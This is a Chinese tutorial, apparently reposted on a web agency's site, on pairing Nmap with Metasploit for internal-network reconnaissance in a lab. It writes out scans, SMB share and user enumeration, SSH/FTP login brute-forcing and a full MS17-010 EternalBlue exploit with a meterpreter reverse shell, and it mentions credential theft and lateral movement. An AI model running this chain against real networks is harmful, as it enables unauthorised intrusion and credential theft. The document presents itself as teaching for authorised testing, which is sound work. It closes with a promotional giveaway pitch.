Nmap+Metasploit 内网信息收集实战

发布时间:2026/9/29 14:21:51
Nmap+Metasploit 内网信息收集实战 NmapMetasploit 内网信息收集实战前言内网渗透的第一步永远是信息收集。拿到内网入口之后我们需要快速摸清网段里有多少存活主机、开放端口、操作系统类型、运行服务版本、是否存在高危漏洞。单独使用 Nmap 可以完成扫描但是扫描结果不方便管理Metasploit简称 MSF自带数据库可以直接导入 Nmap 扫描数据统一管理资产扫描完成后直接调用对应漏洞模块进行验证形成一套完整的扫描 - 入库 - 漏洞验证工作流。很多新手只会单独使用 Nmap 扫端口再手动复制 IP 到 MSF 里去利用效率很低。本文讲解 Nmap 与 Metasploit 联动的完整实战流程从数据库初始化、网段存活探测、端口与服务扫描、NSE 漏洞检测到 MSF 内置模块补充内网枚举最后用永恒之蓝MS17-010做漏洞验证实战。所有操作仅能在本地虚拟机靶场或者拥有书面授权的环境演练。免责声明本文内容仅用于网络安全学习、授权靶场实验。严禁在未授权内网、公网 IP 执行扫描与漏洞探测违规操作会触犯《网络安全法》承担相应法律责任。一、环境说明与前置知识实验环境攻击机Kali Linux内置 Nmap、Metasploit靶场Metasploitable2 / Blue 靶机Windows7存在 MS17-010 永恒之蓝漏洞网段示例192.168.172.0/24核心原理Metasploit 自带 PostgreSQL 数据库用来存储主机、端口、服务、漏洞信息db_nmapMSF 控制台内部直接调用 Nmap扫描结果自动存入数据库无需手动导入文件普通 Nmap 扫描导出 XML 文件可使用db_import导入 MSF 数据库收集完资产后可直接在 MSF 内调用各类 scanner 模块继续深度枚举找到可利用漏洞。二、初始化 MSF 数据库打开 Kali 终端启动数据库服务进入 msfconsole。# 启动postgresql数据库 systemctl start postgresql # 初始化msf数据库首次运行执行一次即可 msfdb init # 进入msf控制台 msfconsole进入 msfconsole 之后验证数据库连接状态msf6 db_status输出Connected to msf代表数据库连接成功。如果提示数据库未连接检查 postgresql 服务是否正常启动。数据库常用查看命令# 查看数据库中所有主机 hosts # 查看所有端口信息 services # 清空数据库实验环境清理上一次扫描记录 hosts -d services -d三、方案 1msf 内直接执行 db_nmap推荐自动入库db_nmap本质就是调用本机 Nmap扫描完成自动把主机、端口、服务版本写入 MSF 数据库省去导入文件步骤实战最常用。步骤 1网段存活主机探测只找存活机器不扫端口msf6 db_nmap -sn 192.168.172.0/24-sn只探测存活主机不扫描端口速度快扫描结束后执行hosts就能看到网段所有在线 IP自动入库。步骤 2对存活主机全面扫描OS 识别、服务版本、默认脚本拿到存活 IP 之后执行全面扫描msf6 db_nmap -A -T4 192.168.172.148参数说明-A开启操作系统识别-O、服务版本探测-sV、默认脚本-sC、路由追踪-T4扫描速度模板内网推荐 T4T5 发包过快容易丢包、触发告警扫描结束执行hosts和services查看入库资产。# 查看主机列表 hosts # 过滤查看80端口服务 services -p 80 # 过滤445端口Windows主机查找SMB服务 services -p 445步骤 3db_nmap 直接调用 NSE vuln 脚本做漏洞初筛直接在 msf 内部调用 Nmap 的 vuln 脚本扫描目标是否存在常见高危漏洞结果存入数据库。msf6 db_nmap --script vuln 192.168.172.148脚本会自动检测永恒之蓝、心脏滴血等漏洞。扫描完成我们就可以在 MSF 中搜索对应漏洞模块进行验证。四、方案 2外部 Nmap 扫描XML 结果导入 MSF 数据库如果习惯在系统终端执行 Nmap可将扫描结果导出 xml再导入 MSF。终端执行 Nmap 扫描输出 xml 格式nmap -A -T4 192.168.172.148 -oX scan_result.xml进入 msfconsole导入 xml 文件msf6 db_import scan_result.xml导入完成查看资产hosts services注意只能导入-oX生成的 xml 格式普通 txt 文本无法导入。五、MSF 内置辅助模块补充内网信息收集Nmap 拿到基础端口和版本信息之后使用 MSF 自带的auxiliary/scanner系列模块做深度内网枚举这一步是 Nmap 做不到的。1. ARP 扫描二层内网存活探测内网准确率最高msf6 use auxiliary/scanner/discovery/arp_sweep msf6 auxiliary(arp_sweep) set RHOSTS 192.168.172.0/24 msf6 auxiliary(arp_sweep) set THREADS 10 msf6 auxiliary(arp_sweep) runARP 扫描工作在二层不受 ICMP ping 拦截影响内网找存活主机效果优于 Nmap-sn。扫描到的主机自动存入数据库。2. SMB 服务枚举Windows 内网重点445 端口Nmap 发现 445 端口开放就可以使用 MSF 模块枚举 SMB 共享、系统用户是横向移动关键信息。枚举 SMB 共享文件夹use auxiliary/scanner/smb/smb_enumshares set RHOSTS 192.168.172.148 run枚举系统用户use auxiliary/scanner/smb/smb_enumusers set RHOSTS 192.168.172.148 run检测永恒之蓝 MS17-010漏洞预检测模块不会直接利用use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.172.148 run如果返回Host is likely VULNERABLE to MS17-010说明目标存在永恒之蓝漏洞下一步直接调用漏洞利用模块。3. FTP、SSH 弱口令探测# FTP匿名登录检测 use auxiliary/scanner/ftp/ftp_login set RHOSTS 192.168.172.148 run # SSH弱口令探测 use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168.172.148 run4. TCP 端口扫描模块MSF 原生扫描不调用 Nmapuse auxiliary/scanner/portscan/tcp set RHOSTS 192.168.172.148 set THREADS 10 run六、实战串联Nmap 扫描发现 MS17-010MSF 漏洞利用完整实战链路db_nmap 扫描 → 发现 445 端口开放 → smb_ms17_010 模块验证漏洞 → exploit 模块拿到 meterpreter 会话。使用 db_nmap 扫描靶机msf6 db_nmap -A 192.168.172.148services 查看目标 445 端口开放操作系统识别为 Windows7。使用 smb_ms17_010 检测模块验证漏洞use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.172.148 run确认目标存在 MS17-010 永恒之蓝漏洞。加载永恒之蓝漏洞利用模块# 搜索永恒之蓝模块 search eternalblue # 加载漏洞利用模块 use exploit/windows/smb/ms17_010_eternalblue # 查看需要配置参数 show options设置参数执行攻击# 靶机IP set RHOSTS 192.168.172.148 # 攻击机网卡IP set LHOST 192.168.172.131 # payload选择meterpreter set payload windows/x64/meterpreter/reverse_tcp # 执行攻击 exploit成功拿到 meterpreter 会话进入靶机。# 获取目标系统信息 sysinfo # 查看当前权限 getuid拿到会话之后还可以做后渗透操作抓取凭证、查看内网网段继续横向移动。七、完整内网信息收集实战流程实战标准步骤启动 PostgreSQLmsfconsole确认 db_status 正常db_nmap -sn C段探测网段存活主机db_nmap -A -T4 存活IP端口、系统、服务版本扫描入库db_nmap --script vulnNSE 脚本批量漏洞初筛MSF 辅助模块深度枚举arp_sweep、smb_enumshares、smb_ms17_010根据扫描结果搜索对应 exploit 模块尝试漏洞利用获取 meterpreter 会话内网横向。优势所有资产统一存在 MSF 数据库hosts/services 随时查看不用手动保存大量 Nmap 扫描文本方便整理渗透报告。八、新手高频踩坑点❌ 坑 1db_nmap 扫描之后hosts 看不到主机记录原因数据库未连接。先执行 db_status确认数据库正常或者直接msfdb reinit重置数据库。❌ 坑 2Nmap 识别操作系统错误防火墙、负载均衡会篡改 TCP 指纹OS 识别只能作为参考需要配合服务版本综合判断。❌ 坑 3直接对公网网段执行 db_nmap 扫描扫描会产生大量告警属于违法行为仅在本地靶场使用。❌ 坑 4MSF 扫描模块 THREADS 线程设置过大内网扫描线程过高会造成网络卡顿、丢包一般设置 10~20 足够。❌ 坑 5混淆 RHOSTS 与 LHOSTRHOSTS目标靶机 IPLHOST攻击机 IP永恒之蓝利用最容易配置错误。九、学习建议先吃透 Nmap 基础扫描理解端口、服务版本、NSE 脚本再学习和 MSF 联动优先使用虚拟机搭建内网靶场Metasploitable2、Blue练习这套流程信息收集是内网渗透最重要环节漏洞利用只是信息收集之后的结果学会区分Nmap 擅长端口、版本、指纹扫描MSF 擅长漏洞验证、辅助枚举、漏洞利用、会话管理。两者是互补关系。总结Nmap 负责外部探测、资产发现、版本识别、漏洞初筛Metasploit 负责资产入库、深度枚举、漏洞验证、获取 shell。使用db_nmap可以打通两者扫描数据自动存入 MSF 数据库不用手动复制粘贴 IP形成一套高效的内网信息收集工作流。这套工作流是内网渗透入门的核心技能理解这套联动思路才能从单纯的工具使用者建立完整内网渗透思维。一句话总结Nmap 摸清内网资产MSF 管理资产并验证漏洞信息收集到位漏洞利用水到渠成。以上就是今天的分享觉得有帮助记得点赞收藏以上所说到的漏洞扫描工具都整理成压缩包了朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】同时还为准备学习网络安全黑客或者正在学习整理了一套360独家内部资料包含以下内容如有需要也可文末获取①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

关于本文作者

来自尧图内容编辑团队

尧图内容编辑团队 内容团队

尧图内容编辑团队

本文由尧图网络内容编辑团队执笔。团队由资深项目经理、前端工程师与设计师组成,所有内容均来自亲手交付的真实项目,先讲清问题、再给出可落地的解法。尧图深耕北京网站建设十年,服务过京华建材集团、智造科技等各行业客户,把一线经验沉淀为可复用的行业观察。

  • 十年建站经验,覆盖建材、制造、服务、文创等
  • 项目经理把关选题与事实准确性
  • 工程师与设计师联合撰写专业细节
  • 统一编辑规范,保证文风与排版一致
  • 每月复盘转化数据,迭代选题方向

延伸阅读

相关资讯与近期热门内容

深度阅读推荐

建站决策前值得细读的三篇

网站改版的5个关键决策
2024-08-12

网站改版的5个关键决策

什么时候该改版、改到什么程度、如何避免流量掉光,京华建材集团改版复盘给出答案。

获取专属建站方案

看完文章,把您的行业与预算告诉我们,免费获取一份量身定制的官网建设方案与报价。

立即免费咨询